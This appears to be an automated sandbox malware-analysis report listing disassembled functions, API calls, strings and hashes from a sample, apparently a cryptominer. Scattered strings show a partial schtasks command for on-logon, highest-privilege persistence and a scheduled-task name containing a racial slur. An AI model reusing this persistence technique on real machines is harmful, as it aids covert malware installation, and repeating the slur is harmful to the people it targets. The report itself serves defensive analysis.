                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$wcslen
                                                                                        • String ID: $0'$0$@$AMD$ATI$Advanced Micro Devices$NVIDIA$PROGRAMFILES=$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                                                                        • API String ID: 1844840824-1551673046
                                                                                        • Opcode ID: d40a7d35b8033e0c9caa4738638b74ada4c7e0bd2bd650a7abbcd8759ce7c2bc
                                                                                        • Instruction ID: 82176fea7c63782db4b45154ae39045396e44b26334088ca364cbb9403f128f8
                                                                                        • Opcode Fuzzy Hash: d40a7d35b8033e0c9caa4738638b74ada4c7e0bd2bd650a7abbcd8759ce7c2bc
                                                                                        • Instruction Fuzzy Hash: 73524E10D2DA8359F713BB2FA4413B463E0AF95398F045335DB8C966A3EFADA195C309
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297EE50 Relevance: 31.7, APIs: 21, Instructions: 232memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 424 7ff6b297ee50-7ff6b297ee65 425 7ff6b297ee67-7ff6b297ee73 malloc 424->425 426 7ff6b297eea0-7ff6b297eead malloc 424->426 427 7ff6b297ee75-7ff6b297ee86 425->427 428 7ff6b297eee2-7ff6b297ef21 abort CreateSemaphoreW TlsAlloc 425->428 426->428 429 7ff6b297eeaf-7ff6b297eec8 426->429 430 7ff6b297eeca-7ff6b297eee1 memset 427->430 431 7ff6b297ee88-7ff6b297ee9d memcpy 427->431 433 7ff6b297ef23-7ff6b297ef32 call 7ff6b29867f0 428->433 434 7ff6b297ef40-7ff6b297ef46 GetLastError 428->434 429->430 429->431 436 7ff6b297ef37-7ff6b297ef39 433->436 434->436 437 7ff6b297ef3b-7ff6b297ef3f 436->437 438 7ff6b297ef48-7ff6b297ef6c abort 436->438 439 7ff6b297ef88-7ff6b297ef8f 438->439 440 7ff6b297ef6e-7ff6b297ef75 438->440 443 7ff6b297ef91-7ff6b297efb9 GetLastError TlsGetValue SetLastError 439->443 444 7ff6b297f000-7ff6b297f006 439->444 441 7ff6b297ef77-7ff6b297ef83 440->441 442 7ff6b297eff0-7ff6b297eff9 call 7ff6b297ee50 440->442 442->441 447 7ff6b297f070-7ff6b297f08a calloc 443->447 448 7ff6b297efbf-7ff6b297efc5 443->448 445 7ff6b297f00c-7ff6b297f016 444->445 446 7ff6b297f11a-7ff6b297f121 444->446 451 7ff6b297f01c-7ff6b297f024 445->451 452 7ff6b297f148-7ff6b297f150 445->452 446->443 453 7ff6b297f127-7ff6b297f13d 446->453 454 7ff6b297f1a3-7ff6b297f1b3 abort 447->454 455 7ff6b297f090 447->455 456 7ff6b297efcb-7ff6b297efd7 448->456 457 7ff6b297f0b8-7ff6b297f0df realloc 448->457 458 7ff6b297f17c-7ff6b297f190 WaitForSingleObject 451->458 459 7ff6b297f02a-7ff6b297f031 451->459 460 7ff6b297f152-7ff6b297f16a 452->460 461 7ff6b297f101-7ff6b297f106 call 7ff6b297eef0 452->461 464 7ff6b297f1b5-7ff6b297f1b8 454->464 465 7ff6b297f1c0-7ff6b297f1c4 454->465 462 7ff6b297f093-7ff6b297f0a4 TlsSetValue 455->462 456->441 463 7ff6b297efd9-7ff6b297efe6 call 7ff6b297ee50 456->463 457->454 466 7ff6b297f0e5-7ff6b297f0ff memset 457->466 458->459 470 7ff6b297f196-7ff6b297f19e 458->470 459->453 467 7ff6b297f037-7ff6b297f03b 459->467 468 7ff6b297f16c 460->468 469 7ff6b297f110-7ff6b297f114 460->469 461->469 462->456 471 7ff6b297f0aa-7ff6b297f0ad GetLastError 462->471 463->441 464->465 473 7ff6b297f1ca-7ff6b297f1cd 465->473 474 7ff6b297f1c6 465->474 466->462 467->443 479 7ff6b297f041-7ff6b297f049 467->479 480 7ff6b297f170-7ff6b297f178 Sleep 468->480 469->446 469->451 470->459 471->456 476 7ff6b297f1d4 473->476 477 7ff6b297f1cf-7ff6b297f1d2 473->477 474->473 477->476 482 7ff6b297f1d8-7ff6b297f1dc 477->482 479->443 483 7ff6b297f04f-7ff6b297f064 ReleaseSemaphore 479->483 480->480 484 7ff6b297f17a 480->484 483->443 484->469
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 342303811-0
                                                                                        • Opcode ID: 9540ecb44eb3dad323a813c296351d8f7464fd56d16fa0a9472f623535802938
                                                                                        • Instruction ID: fb347c600d898995e2331b443db31d91ebe47f85c64c2c6733768ea53fc5cdf9
                                                                                        • Opcode Fuzzy Hash: 9540ecb44eb3dad323a813c296351d8f7464fd56d16fa0a9472f623535802938
                                                                                        • Instruction Fuzzy Hash: 4C918131A0964385EA17BF2BA80467923E1AF44B9CF584438DB4D977A7DFBCE8568301
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2987700 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 102fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
                                                                                        • String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                                                                        • API String ID: 802779101-808685626
                                                                                        • Opcode ID: ae96ca8ce978ed83f0410bb1cf3242792faa4f94d5cdb185b9dcf52c569558b0
                                                                                        • Instruction ID: a2ad271b12f5e4c176f64043173c1a824efe8d77513e3a524847ecfafd8eb4a0
                                                                                        • Opcode Fuzzy Hash: ae96ca8ce978ed83f0410bb1cf3242792faa4f94d5cdb185b9dcf52c569558b0
                                                                                        • Instruction Fuzzy Hash: B141CE14B1915745FA16B7ABA8293B906C1AF89BC8F0C4139DB0ECF7D7EEACE4018311
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297E900 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 127COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaiseUnwindabort
                                                                                        • String ID: CCG $CCG!$CCG!$CCG"
                                                                                        • API String ID: 4140830120-3707373406
                                                                                        • Opcode ID: 3e6441376f4647d330057410b5d8a81e19eae72e31a5c50abc30cdc984ccff24
                                                                                        • Instruction ID: 619fbc82965ad60b17b254c5212eae3825225ecc17770dbb29de5f43b4c57993
                                                                                        • Opcode Fuzzy Hash: 3e6441376f4647d330057410b5d8a81e19eae72e31a5c50abc30cdc984ccff24
                                                                                        • Instruction Fuzzy Hash: 4851B033A08B8282E7619B1AE4446A973B0F789B98F544136EFCD53769DF78D582C701
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297C2F0 Relevance: 15.3, APIs: 4, Strings: 6, Instructions: 346stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 544 7ff6b297c2f0-7ff6b297c31b 545 7ff6b297c718-7ff6b297c722 544->545 546 7ff6b297c321-7ff6b297c33b strncmp 544->546 545->546 547 7ff6b297c728 545->547 548 7ff6b297c696-7ff6b297c69f 546->548 549 7ff6b297c341-7ff6b297c376 546->549 547->549 548->549 550 7ff6b297c6a5-7ff6b297c6b3 548->550 551 7ff6b297c43b-7ff6b297c4a5 strlen 549->551 550->549 552 7ff6b297c6b9-7ff6b297c6bf 550->552 553 7ff6b297c72d 551->553 554 7ff6b297c4ab-7ff6b297c4f5 call 7ff6b297e3e0 * 2 551->554 556 7ff6b297c6c9-7ff6b297c6d0 552->556 557 7ff6b297c6c1-7ff6b297c6c3 552->557 555 7ff6b297c72f-7ff6b297c742 553->555 563 7ff6b297c4fb-7ff6b297c4fe 554->563 564 7ff6b297c380-7ff6b297c383 554->564 556->549 559 7ff6b297c6d6-7ff6b297c6e3 556->559 557->549 557->556 559->549 567 7ff6b297c427-7ff6b297c42b 563->567 568 7ff6b297c504-7ff6b297c510 563->568 565 7ff6b297c389-7ff6b297c395 564->565 566 7ff6b297c650-7ff6b297c660 call 7ff6b2974e60 564->566 572 7ff6b297c397-7ff6b297c39b 565->572 573 7ff6b297c3a1-7ff6b297c3b0 strlen 565->573 577 7ff6b297c668-7ff6b297c67a 566->577 569 7ff6b297c743 567->569 570 7ff6b297c431-7ff6b297c438 567->570 568->567 574 7ff6b297c516-7ff6b297c528 568->574 575 7ff6b297c745-7ff6b297c748 569->575 570->551 572->573 572->577 578 7ff6b297c70c-7ff6b297c710 573->578 579 7ff6b297c3b6-7ff6b297c3cf 573->579 580 7ff6b297c6fc-7ff6b297c704 call 7ff6b29771a0 574->580 581 7ff6b297c52e-7ff6b297c530 574->581 575->555 584 7ff6b297c67c-7ff6b297c67e 577->584 585 7ff6b297c6e8-7ff6b297c6f7 call 7ff6b29771a0 577->585 578->545 579->578 586 7ff6b297c3d5-7ff6b297c3f1 579->586 580->578 581->580 582 7ff6b297c536-7ff6b297c551 call 7ff6b2977c10 581->582 598 7ff6b297c41a-7ff6b297c41d 582->598 599 7ff6b297c557-7ff6b297c559 582->599 584->585 590 7ff6b297c680-7ff6b297c691 call 7ff6b2977c10 584->590 591 7ff6b297c3f5-7ff6b297c416 call 7ff6b2974150 strlen 585->591 586->591 590->591 591->598 598->567 600 7ff6b297c41f-7ff6b297c421 598->600 599->598 601 7ff6b297c55f 599->601 600->567 602 7ff6b297c74a-7ff6b297c7e0 call 7ff6b29744d0 600->602 603 7ff6b297c560-7ff6b297c578 601->603 614 7ff6b297c7ec-7ff6b297c893 call 7ff6b297e3e0 * 2 call 7ff6b297af30 602->614 615 7ff6b297c7e2 602->615 604 7ff6b297c8a4-7ff6b297c8ab 603->604 605 7ff6b297c57e-7ff6b297c581 603->605 607 7ff6b297c8b1-7ff6b297c8b4 604->607 608 7ff6b297c58f-7ff6b297c597 604->608 605->604 609 7ff6b297c587-7ff6b297c589 605->609 607->608 611 7ff6b297c8ba-7ff6b297c8c0 607->611 613 7ff6b297c5a9-7ff6b297c5c1 608->613 609->608 612 7ff6b297c898-7ff6b297c89f 609->612 616 7ff6b297c5d0-7ff6b297c5d2 611->616 612->598 617 7ff6b297c5c3-7ff6b297c5c5 613->617 618 7ff6b297c5a0-7ff6b297c5a5 613->618 614->575 615->614 622 7ff6b297c60d-7ff6b297c638 call 7ff6b2974250 call 7ff6b2974150 616->622 623 7ff6b297c5d4-7ff6b297c5de 616->623 617->618 620 7ff6b297c5c7 617->620 618->613 620->616 622->598 636 7ff6b297c63e-7ff6b297c641 622->636 623->622 626 7ff6b297c5e0-7ff6b297c5f2 623->626 626->616 627 7ff6b297c5f4 626->627 631 7ff6b297c5f8-7ff6b297c607 627->631 631->631 634 7ff6b297c609-7ff6b297c60b 631->634 634->622 634->623 636->603
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlenstrncmp
                                                                                        • String ID: Z$Z$_$_$_$_GLOBAL_
                                                                                        • API String ID: 1310274236-662103887
                                                                                        • Opcode ID: c914cae3b5cf8efe83334340236a7be40f521ae75959e789acde5be847f17d48
                                                                                        • Instruction ID: aa0431dbf937279565b58f999ffb221ee40ba3bb1ae222b892e1b35837a18f8e
                                                                                        • Opcode Fuzzy Hash: c914cae3b5cf8efe83334340236a7be40f521ae75959e789acde5be847f17d48
                                                                                        • Instruction Fuzzy Hash: 3FE1C172A0868389F7229F3A98043FD3BE1BB0479CF544231DB6C9A796DF7D96458700
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297DB86 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 113COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 638 7ff6b297db86-7ff6b297dbab 639 7ff6b297dbb1-7ff6b297dbb6 638->639 640 7ff6b297dd00-7ff6b297dd04 638->640 642 7ff6b297dbb8-7ff6b297dbbd 639->642 643 7ff6b297dc13-7ff6b297dc18 639->643 640->639 641 7ff6b297dd0a 640->641 646 7ff6b297dc60 641->646 644 7ff6b297dc32-7ff6b297dc42 signal 642->644 645 7ff6b297dbbf-7ff6b297dbc4 642->645 647 7ff6b297dcd5-7ff6b297dce5 call 7ff6b29866a8 643->647 648 7ff6b297dc1e 643->648 654 7ff6b297dc48-7ff6b297dc5c signal call 7ff6b297d540 644->654 655 7ff6b297dce7-7ff6b297dcea 644->655 645->646 650 7ff6b297dbca 645->650 651 7ff6b297dc65-7ff6b297dc6a 646->651 647->655 665 7ff6b297dd20-7ff6b297dd34 signal 647->665 652 7ff6b297dc70-7ff6b297dc75 648->652 653 7ff6b297dc20-7ff6b297dc25 648->653 657 7ff6b297dcb0-7ff6b297dcb5 650->657 658 7ff6b297dbd0-7ff6b297dbd5 650->658 652->646 661 7ff6b297dc77-7ff6b297dc7c 652->661 653->646 662 7ff6b297dc27-7ff6b297dc2c 653->662 654->646 659 7ff6b297dcec-7ff6b297dcf8 655->659 660 7ff6b297dcbe-7ff6b297dcc8 655->660 667 7ff6b297dc7e-7ff6b297dc8e signal 657->667 668 7ff6b297dcb7-7ff6b297dcbc 657->668 658->646 666 7ff6b297dbdb-7ff6b297dbe0 658->666 659->651 669 7ff6b297dcca-7ff6b297dcd1 660->669 670 7ff6b297dd10-7ff6b297dd17 660->670 661->660 661->667 662->644 662->660 665->651 666->660 671 7ff6b297dbe6-7ff6b297dbf6 signal 666->671 673 7ff6b297dd39-7ff6b297dd4b signal 667->673 674 7ff6b297dc94-7ff6b297dc97 667->674 668->646 668->660 669->647 675 7ff6b297dbfc-7ff6b297dbff 671->675 676 7ff6b297dd50-7ff6b297dd62 signal 671->676 673->651 674->660 677 7ff6b297dc99-7ff6b297dca5 674->677 675->660 678 7ff6b297dc05-7ff6b297dc11 675->678 676->651 677->651 678->651
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: signal
                                                                                        • String ID: CCG
                                                                                        • API String ID: 1946981877-1584390748
                                                                                        • Opcode ID: 49b0dc0c814c919c10a99f5bf63d3d6ab85b0b9d6c9724e6b01ec1ffaef6101b
                                                                                        • Instruction ID: b1d24f9d3793ffe51eded5d037ffe0f2a479f706057e015a734ffed006092669
                                                                                        • Opcode Fuzzy Hash: 49b0dc0c814c919c10a99f5bf63d3d6ab85b0b9d6c9724e6b01ec1ffaef6101b
                                                                                        • Instruction Fuzzy Hash: FD410A20E1A54346FA7A326E449137911C19F9AB2CF2D8635D72DDB3F3DFDCA8805222
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297D550 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryVirtual
                                                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                        • API String ID: 1804819252-1534286854
                                                                                        • Opcode ID: a6d9122e00c00e9fac281b6b2975abf14a44b6093c547a3eb042b90889feb3c8
                                                                                        • Instruction ID: bdff691ec4e47099ea8e07cfe2d28f63a4224d2fc883619b3741bf241b9fb93d
                                                                                        • Opcode Fuzzy Hash: a6d9122e00c00e9fac281b6b2975abf14a44b6093c547a3eb042b90889feb3c8
                                                                                        • Instruction Fuzzy Hash: BD61B272B0964386E712AF1AE84027977E0AB88B98F444135EF4D877A6EF7CE551C310
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2981650 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: fwprintf
                                                                                        • String ID: %*.*S$%-*.*S$%.*S
                                                                                        • API String ID: 968622242-2115465065
                                                                                        • Opcode ID: 575a4e86318dea34aa8239c07f2f226d86714703114f2fb89409e6163cbfb4b8
                                                                                        • Instruction ID: 6a81308bde8b101efb46b6974a81a80fce7c6741a577fd4aa182c72c6bd63cb6
                                                                                        • Opcode Fuzzy Hash: 575a4e86318dea34aa8239c07f2f226d86714703114f2fb89409e6163cbfb4b8
                                                                                        • Instruction Fuzzy Hash: 4E41A363A1864345F752AA2ED4006B962E1AB84BD8F1C8139DF4D8F6C7DEBCE5418B00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2981900 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %*.*s$%-*.*s$%.*s$%S <#kbbksn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest
                                                                                        • API String ID: 0-3540679199
                                                                                        • Opcode ID: 8e66d3840af80ef5d14195085cc5a232f355be66654e25f5e7f11b77a63d9f47
                                                                                        • Instruction ID: ce7c418eefe3d78a2337f7be85ee221e0cda8859bb7b215c29f30234636a0884
                                                                                        • Opcode Fuzzy Hash: 8e66d3840af80ef5d14195085cc5a232f355be66654e25f5e7f11b77a63d9f47
                                                                                        • Instruction Fuzzy Hash: 71419072A0864786E761AE2ED40027977D5EB40BDCF1CC134DF4D8E687EEBDA5418B10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B2972BA0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478791507.00007FF6B298A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478817870.00007FF6B298C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2993000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478835027.00007FF6B2995000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000A.00000002.4478883299.00007FF6B2998000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_7ff6b2970000_conhost.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcscatwcscpywcslen
                                                                                        • String ID: \??\$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MINEINEYNIGGA
                                                                                        • API String ID: 468205783-1300384374
                                                                                        • Opcode ID: 7b0665e4b0d3bccd0e4723797bbdb633f523b570014c4a6b6fd98894cae72738
                                                                                        • Instruction ID: 9988fbd50b184f1a67178a1e64641e79ed38e799bce10748dbfd2bcc3004cb26
                                                                                        • Opcode Fuzzy Hash: 7b0665e4b0d3bccd0e4723797bbdb633f523b570014c4a6b6fd98894cae72738
                                                                                        • Instruction Fuzzy Hash: BD31741191978349F712AF2AE84137933E0AF9579CF048235DA4C9AAA3DFBCA195C309
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FF6B297D7C0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualProtect.KERNEL32(00007FF6B29948F8,00007FF6B29948F0,00007FF6B2993DC0,00007FF8C6F6ADA0,?,?,?,00000001,00007FF6B297124C), ref: 00007FF6B297D97D
                                                                                          • Part of subcall function 00007FF6B297D5C0: VirtualQuery.KERNEL32 ref: 00007FF6B297D66B
                                                                                        Strings
                                                                                        • Unknown pseudo relocation protocol version %d., xrefs: 00007FF6B297DB22
                                                                                        • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF6B297DB13
                                                                                        • Unknown pseudo relocation bit size %d., xrefs: 00007FF6B297DAFA
                                                                                        Memory Dump Source
